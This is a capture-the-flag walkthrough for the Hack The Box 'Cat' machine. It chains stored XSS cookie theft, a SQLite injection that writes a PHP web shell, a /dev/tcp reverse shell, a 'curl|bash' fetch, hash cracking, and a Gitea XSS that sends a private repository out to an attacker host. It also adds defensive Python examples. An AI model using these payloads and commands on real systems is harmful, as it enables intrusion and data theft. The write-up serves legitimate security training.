Hack The Box / LINUX / 2025-02-08

Hack The Box — Cat (Linux)

Stored XSS steals admin session, SQLite injection writes web shell, credential reuse and log leakage pivot to axel, then Gitea XSS-driven repo theft reveals root credentials.

Target

  • IP: 10.129.231.253

Recon

sudo nmap -sC -sV 10.129.231.253 -p- -T5 -v
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 96:2d:f5:c6:f6:9f:59:60:e5:65:85:ab:49:e4:76:14 (RSA)
|   256 9e:c4:a4:40:e9:da:cc:62:d1:d6:5a:2f:9e:7b:d4:aa (ECDSA)
|_  256 6e:22:2a:6a:6d:eb:de:19:b7:16:97:c2:7e:89:29:d5 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://cat.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Add cat.htb to /etc/hosts.

Go to http://cat.htb/.

It is a PHP site.

Go to Join.

Register with any user.

Click Already have an account.

Log in.

gobuster dir -u 'http://cat.htb/' -w /home/kali/SecLists/Discovery/Web-Content/raft-small-words.txt -t 50 -x php

We notice:

/.git                 (Status: 301) [Size: 301] [--> http://cat.htb/.git/]
/uploads              (Status: 301) [Size: 304] [--> http://cat.htb/uploads/]

Download git-dumper: https://github.com/arthaud/git-dumper

mkdir repo
python3 git-dumper/git_dumper.py http://cat.htb/ repo
cd repo

We now have website source code.

We discover it uses an SQLite database named /databases/cat.db.

The username we register is stored and later rendered unescaped when the admin reviews registrations, giving a stored XSS.

Start Python HTTP server listener:

python3 -m http.server 80

Register a user with this username:

<img src=x onerror=this.src='http://10.10.14.2/?c='+document.cookie;>

Register a cat with random details.

Wait.

In the Python HTTP server terminal we receive the admin's session cookie, for example:

PHPSESSID=t0ip0d2tts1rfnq2fdg32f8su6

Set it as the PHPSESSID cookie in the browser.

We become admin.

In accept_cat.php we notice:

if ($_SERVER["REQUEST_METHOD"] == "POST") {
    if (isset($_POST['catId']) && isset($_POST['catName'])) {
        $cat_name = $_POST['catName'];
        $catId = $_POST['catId'];
        // catName is concatenated into the statement and run with exec(),
        // which executes every statement in the string: injectable.
        $sql_insert = "INSERT INTO accepted_cats (name) VALUES ('$cat_name')";
        $pdo->exec($sql_insert);

        // catId, by contrast, is bound as a typed parameter.
        $stmt_delete = $pdo->prepare("DELETE FROM cats WHERE cat_id = :cat_id");
        $stmt_delete->bindParam(':cat_id', $catId, PDO::PARAM_INT);
        $stmt_delete->execute();

        echo "The cat has been accepted and added successfully.";
    }
}

There is SQL injection: catName goes straight into the INSERT string, and PDO::exec() on SQLite runs every statement it is given, so we can close the VALUES clause and append statements of our own.
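The defect above reproduced against an in-memory SQLite database with a constructed payload of the same shape, beside the parameterised form that fixes it (added Python example, not the box's source; executescript() stands in for PDO::exec(), which likewise runs every statement in the string):

```python
import sqlite3

# Constructed payload in the shape of the one sent to accept_cat.php, minus the
# ATTACH to a file path: it closes the VALUES clause, appends a second statement
# and comments out the rest of the original INSERT with "--".
INJECTED_NAME = "a'); CREATE TABLE pwn (dataz text); --"


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE accepted_cats (name text)")
    return con


def accept_cat_vulnerable(con, cat_name):
    # Mirrors the PHP: the name is interpolated into the SQL text and handed to
    # an API that executes every statement it finds, like PDO::exec().
    con.executescript(f"INSERT INTO accepted_cats (name) VALUES ('{cat_name}')")


def accept_cat_fixed(con, cat_name):
    # Fix: bind the value instead of splicing it in. The driver passes it as
    # data, so quotes and semicolons inside it cannot change the SQL.
    con.execute("INSERT INTO accepted_cats (name) VALUES (?)", (cat_name,))


def table_exists(con, table):
    row = con.execute("SELECT 1 FROM sqlite_master WHERE type='table' AND name=?",
                      (table,)).fetchone()
    return row is not None


def names(con):
    return [r[0] for r in con.execute("SELECT name FROM accepted_cats")]


def demo():
    vuln = make_db()
    accept_cat_vulnerable(vuln, INJECTED_NAME)
    fixed = make_db()
    accept_cat_fixed(fixed, INJECTED_NAME)
    return {
        "vuln_table_created": table_exists(vuln, "pwn"),   # True: injection ran
        "vuln_names": names(vuln),                         # ['a']
        "fixed_table_created": table_exists(fixed, "pwn"), # False
        "fixed_names": names(fixed),                       # payload stored as text
    }
```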

Useful reference:

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md

curl -X POST 'http://cat.htb/accept_cat.php' --cookie 'PHPSESSID=t0ip0d2tts1rfnq2fdg32f8su6' -d "catName=a'); ATTACH DATABASE 'uploads/shell.php' AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES (\"<?php system($_GET['cmd']); ?>\"); -- &catId=1"

If it does not work, intercept with Burp:

curl -X POST 'http://cat.htb/accept_cat.php' --cookie 'PHPSESSID=t0ip0d2tts1rfnq2fdg32f8su6' -d "catName=a'); ATTACH DATABASE 'uploads/shell.php' AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES (\"<?php system($_GET['cmd']); ?>\"); -- &catId=1" --proxy 'http://127.0.0.1:8080/'

URL-encode the payload in Burp before forwarding the request.

Create a file rev with content:

bash -i >& /dev/tcp/10.10.14.2/4444 0>&1

Start listeners:

python3 -m http.server 80
nc -vlnp 4444

Go to:

http://cat.htb/uploads/shell.php?cmd=curl http://10.10.14.2/rev|bash

We get a reverse shell as www-data.

Download databases/cat.db to our machine.

sqlite3 cat.db
.tables
accepted_cats  cats           users
select * from users;
1|axel|axel2017@gmail.com|d1bbba3670feb9435c9841e46e60ee2f
2|rosa|rosamendoza485@gmail.com|ac369922d560f17d6eeb8b2c7dec498c
3|robert|robertcervantes2000@gmail.com|42846631708f69c00ec0c0a8aa4a92ad
4|fabian|fabiancarachure2323@gmail.com|39e153e825c4a3d314a0dc7f7475ddbe
5|jerryson|jerrysonC343@gmail.com|781593e060f8d065cd7281c5ec5b4b86
6|larry|larryP5656@gmail.com|1b6dce240bbfbc0905a664ad199e18f8
7|royer|royer.royer2323@gmail.com|c598f6b844a36fa7836fba0835f1f6
8|peter|peterCC456@gmail.com|e41ccefa439fc454f7eadbf1f139ed8a
9|angel|angel234g@gmail.com|24a8ec003ac2e1b3c5953a6f95f8f565
10|jobert|jobert2020@gmail.com|88e4dceccd48820cf77b5cf6c08698ad

Put this in file hash:

axel:d1bbba3670feb9435c9841e46e60ee2f
rosa:ac369922d560f17d6eeb8b2c7dec498c
robert:42846631708f69c00ec0c0a8aa4a92ad
fabian:39e153e825c4a3d314a0dc7f7475ddbe
jerryson:781593e060f8d065cd7281c5ec5b4b86
larry:1b6dce240bbfbc0905a664ad199e18f8
royer:c598f6b844a36fa7836fba0835f1f6
peter:e41ccefa439fc454f7eadbf1f139ed8a
angel:24a8ec003ac2e1b3c5953a6f95f8f565
jobert:88e4dceccd48820cf77b5cf6c08698ad
hashcat -a 0 -m 0 ./hash ./rockyou.txt --username
hashcat -a 0 -m 0 ./hash ./rockyou.txt --username --show
rosa:ac369922d560f17d6eeb8b2c7dec498c:soyunaprincesarosa
ssh rosa@cat.htb

Use the cracked password.

We get a shell as rosa.

id
uid=1001(rosa) gid=1001(rosa) groups=1001(rosa),4(adm)

The adm group is used in Linux for system monitoring tasks. Its members can read many of the log files under /var/log and can use xconsole. This can be exploited because confidential information, such as user passwords, sometimes ends up in application or system logs.

cat /var/log/apache2/access.log.1

We find a login request whose credentials were sent as GET parameters and therefore ended up in the log:

127.0.0.1 - - [31/Jan/2025:12:30:03 +0000] "GET /join.php?loginUsername=axel&loginPassword=aNdZwgC4tI9gnVXv_e3Q&loginForm=Login HTTP/1.1" 302 329 "http://cat.htb/join.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
ssh axel@cat.htb

Use password aNdZwgC4tI9gnVXv_e3Q.
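A detection for exactly this leak, as an added Python example (not from the writeup): it scans Apache combined-format lines for sensitive query parameters in the request line and can redact them before the log is retained. The parameter list is an assumption beyond loginPassword, and the sample lines are constructed.

```python
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Parameter names that must never appear in a logged request line. "loginPassword"
# is the one the Cat login form sent via GET; the rest of the list is an assumption.
SENSITIVE_PARAMS = {"loginpassword", "password", "passwd", "pwd", "token", "secret"}

# Request line of an Apache combined-format entry: "METHOD target HTTP/x.y".
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def find_leaked_params(line):
    """Sensitive parameter names present in the request's query string."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    query = urlsplit(m.group("target")).query
    return sorted({k for k, _ in parse_qsl(query, keep_blank_values=True)
                   if k.lower() in SENSITIVE_PARAMS})


def redact_line(line):
    """Replace sensitive query values so the line can be kept safely."""
    m = REQUEST_RE.search(line)
    if not m:
        return line
    parts = urlsplit(m.group("target"))
    pairs = [(k, "REDACTED" if k.lower() in SENSITIVE_PARAMS else v)
             for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    target = urlunsplit(parts._replace(query=urlencode(pairs)))
    return line[:m.start("target")] + target + line[m.end("target"):]


def scan(lines):
    """(line_number, leaked_param_names) for every offending entry."""
    return [(i, leaked) for i, line in enumerate(lines, 1)
            if (leaked := find_leaked_params(line))]


# Constructed sample entries in the shape of the access.log.1 line above.
SAMPLE_LOG = [
    '127.0.0.1 - - [31/Jan/2025:12:29:58 +0000] "GET /join.php HTTP/1.1" 200 1012 "-" "Mozilla/5.0"',
    '127.0.0.1 - - [31/Jan/2025:12:30:03 +0000] "GET /join.php?loginUsername=axel'
    '&loginPassword=s3cret-example&loginForm=Login HTTP/1.1" 302 329 "http://cat.htb/join.php" "Mozilla/5.0"',
    '127.0.0.1 - - [31/Jan/2025:12:31:10 +0000] "POST /join.php HTTP/1.1" 302 329 "-" "Mozilla/5.0"',
]
```

The real fix is to make the login form POST its credentials; the redaction only limits what an adm-group reader can recover from logs already written.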

ls -la /home
total 24
drwxr-xr-x  6 root   root   4096 Aug 30 23:19 .
drwxr-xr-x 19 root   root   4096 Aug 31 18:28 ..
drwxr-x---  5 axel   axel   4096 Jan 21 12:52 axel
drwxr-x---  3 git    git    4096 Jan 21 12:49 git
drwxr-x---  6 jobert jobert 4096 Jan 21 12:49 jobert
drwxr-x---  5 rosa   rosa   4096 Jan 21 12:49 rosa
ss -ltpn
State        Recv-Q       Send-Q               Local Address:Port                Peer Address:Port       Process
LISTEN       0            37                       127.0.0.1:46161                    0.0.0.0:*
LISTEN       0            4096                 127.0.0.53%lo:53                       0.0.0.0:*
LISTEN       0            128                        0.0.0.0:22                       0.0.0.0:*
LISTEN       0            4096                     127.0.0.1:3000                     0.0.0.0:*
LISTEN       0            10                       127.0.0.1:25                       0.0.0.0:*
LISTEN       0            1                        127.0.0.1:34115                    0.0.0.0:*
LISTEN       0            128                      127.0.0.1:51401                    0.0.0.0:*
LISTEN       0            10                       127.0.0.1:587                      0.0.0.0:*
LISTEN       0            511                              *:80                             *:*
LISTEN       0            128                           [::]:22                          [::]:*
cat /var/spool/mail/axel
From rosa@cat.htb  Sat Sep 28 04:51:50 2024
Return-Path: <rosa@cat.htb>
Received: from cat.htb (localhost [127.0.0.1])
        by cat.htb (8.15.2/8.15.2/Debian-18) with ESMTP id 48S4pnXk001592
        for <axel@cat.htb>; Sat, 28 Sep 2024 04:51:50 GMT
Received: (from rosa@localhost)
        by cat.htb (8.15.2/8.15.2/Submit) id 48S4pnlT001591
        for axel@localhost; Sat, 28 Sep 2024 04:51:49 GMT
Date: Sat, 28 Sep 2024 04:51:49 GMT
From: rosa@cat.htb
Message-Id: <202409280451.48S4pnlT001591@cat.htb>
Subject: New cat services

Hi Axel,

We are planning to launch new cat-related web services, including a cat care website and other projects. Please send an email to jobert@localhost with information about your Gitea repository. Jobert will check if it is a promising service that we can develop.

Important note: Be sure to include a clear description of the idea so that I can understand it properly. I will review the whole repository.

From rosa@cat.htb  Sat Sep 28 05:05:28 2024
Return-Path: <rosa@cat.htb>
Received: from cat.htb (localhost [127.0.0.1])
        by cat.htb (8.15.2/8.15.2/Debian-18) with ESMTP id 48S55SRY002268
        for <axel@cat.htb>; Sat, 28 Sep 2024 05:05:28 GMT
Received: (from rosa@localhost)
        by cat.htb (8.15.2/8.15.2/Submit) id 48S55Sm0002267
        for axel@localhost; Sat, 28 Sep 2024 05:05:28 GMT
Date: Sat, 28 Sep 2024 05:05:28 GMT
From: rosa@cat.htb
Message-Id: <202409280505.48S55Sm0002267@cat.htb>
Subject: Employee management

We are currently developing an employee management system. Each sector administrator will be assigned a specific role, while each employee will be able to consult their assigned tasks. The project is still under development and is hosted in our private Gitea. You can visit the repository at: http://localhost:3000/administrator/Employee-management/. In addition, you can consult the README file, highlighting updates and other important details, at: http://localhost:3000/administrator/Employee-management/raw/branch/main/README.md.
ssh axel@cat.htb -NL 3000:localhost:3000 -NL 25:localhost:25

Enter axel's password.

Go to http://127.0.0.1:3000/.

It is Gitea.

Log in with Axel's credentials.

Gitea version is 1.22.0.

This version is affected by a stored XSS in the repository description; public exploit:

https://www.exploit-db.com/exploits/52077

Start a Python HTTP server listener:

python3 -m http.server 80

In Gitea create a new repository test.

Add a new file with random content.

Go to repository settings.

Set description to:

<a href=javascript:fetch("http://10.10.14.2/?c="+document.cookie)>XSS test</a>

Save settings.

Now we must email jobert a link to the repository so that he opens it (per Rosa's mail, jobert reviews submitted repositories).

swaks --to jobert@cat.htb --from rosa@cat.htb --header "Subject: test" --body 'http://localhost:3000/axel/test' --server 127.0.0.1

Or:

telnet 127.0.0.1 25

Enter:

HELO localhost
MAIL FROM:<rosa@cat.htb>
RCPT TO:<jobert@cat.htb>
DATA
Subject: Test
http://localhost:3000/axel/test
.
QUIT

Wait.

We receive a request, but no cookie.

In the browser (F12 -> Application) we see that the i_like_gitea session cookie is HttpOnly, so document.cookie cannot read it.

Since the cookie is out of reach, change the payload so that jobert's browser fetches the Employee-management repository mentioned in the email and posts it to us.

New payload:

<a href=javascript:eval(atob('ZmV0Y2goJ2h0dHA6Ly9sb2NhbGhvc3Q6MzAwMC9hZG1pbmlzdHJhdG9yL0VtcGxveWVlLW1hbmFnZW1lbnQvYXJjaGl2ZS9tYWluLnppcCcse21ldGhvZDonR0VUJ30pDQoudGhlbigocmVzcG9uc2UpID0+IHsNCnJldHVybiByZXNwb25zZS5ieXRlcygpOw0KfSkNCi50aGVuKChkYXRhKSA9PiB7DQoJZmV0Y2goJ2h0dHA6Ly8xMC4xMC4xNC4yOjU1NTUvJyx7bWV0aG9kOidQT1NUJyxtb2RlOiduby1jb3JzJyxib2R5OmJ0b2EoZGF0YSl9KTsNCn0pDQouY2F0Y2goKGVycm9yKSA9PiB7DQoJZmV0Y2goJ2h0dHA6Ly8xMC4xMC4xNC4yOjU1NTUvJyx7bWV0aG9kOidQT1NUJyxtb2RlOiduby1jb3JzJyxib2R5OmVycm9yfSk7DQp9KTs='))>XSS test</a>

Base64-decoded JavaScript payload:

// Fetch the repository archive with jobert's own session (same origin, cookie sent automatically).
fetch('http://localhost:3000/administrator/Employee-management/archive/main.zip', {method: 'GET'})
    .then((response) => {
        return response.bytes();   // Uint8Array of the zip
    })
    .then((data) => {
        // btoa() stringifies the array to "80,75,3,..." before base64-encoding it.
        fetch('http://10.10.14.2:5555/', {method: 'POST', mode: 'no-cors', body: btoa(data)});
    })
    .catch((error) => {
        fetch('http://10.10.14.2:5555/', {method: 'POST', mode: 'no-cors', body: error});
    });

Start netcat listener:

nc -vlnp 5555 > roba_b64

Modify repo description (or recreate the repo if deleted) with the new payload.

Send the email.

We get a connection.

vim roba_b64

Remove the HTTP request headers that nc captured, leaving only the base64 body.

Go to CyberChef:

https://gchq.github.io/CyberChef/

Set roba_b64 as input.

Recipe: From Base64, then From Decimal. The second step is needed because btoa() was called on a Uint8Array, which is stringified into comma-separated decimal byte values before being base64-encoded.

Save output to a file.

We get a .zip file.

Extract it.
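The same two-layer decode as a script, for reconstructing what a captured exfil POST of this kind actually carried (added Python example, not part of the writeup; the capture it parses is constructed inline, including the btoa()-on-Uint8Array encoding):

```python
import base64
import io
import re
import zipfile


def encode_like_payload(raw):
    """Reproduce btoa(data) on a Uint8Array: the array is stringified to
    comma-separated decimal bytes, and that text is base64-encoded."""
    decimal_list = ",".join(str(b) for b in raw)
    return base64.b64encode(decimal_list.encode("ascii")).decode("ascii")


def decode_capture(capture):
    """Recover the archive bytes from a raw POST captured with nc."""
    # Drop the HTTP request headers: the body begins after the first blank line.
    _, body = re.split(r"\r?\n\r?\n", capture, maxsplit=1)
    decimal_list = base64.b64decode(body.strip()).decode("ascii")   # From Base64
    data = bytes(int(x) for x in decimal_list.split(",") if x)      # From Decimal
    if not data.startswith(b"PK"):
        raise ValueError("decoded data is not a zip archive")
    return data


def build_sample_capture():
    """Constructed stand-in for roba_b64: a tiny zip wrapped in a POST."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Employee-management/index.php", "<?php // constructed sample ?>")
    b64 = encode_like_payload(buf.getvalue())
    return ("POST / HTTP/1.1\r\nHost: 10.10.14.2:5555\r\n"
            "Content-Type: text/plain;charset=UTF-8\r\n"
            f"Content-Length: {len(b64)}\r\n\r\n{b64}")


def list_archive(data):
    """File names inside the recovered archive."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.namelist()
```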

It is a website repository.

cat index.php

We notice:

$valid_username = 'admin';
$valid_password = 'IKw75eR0MR7CMIxhH0';
su root

Enter the password found in index.php; it is reused for root.

We get a shell as root.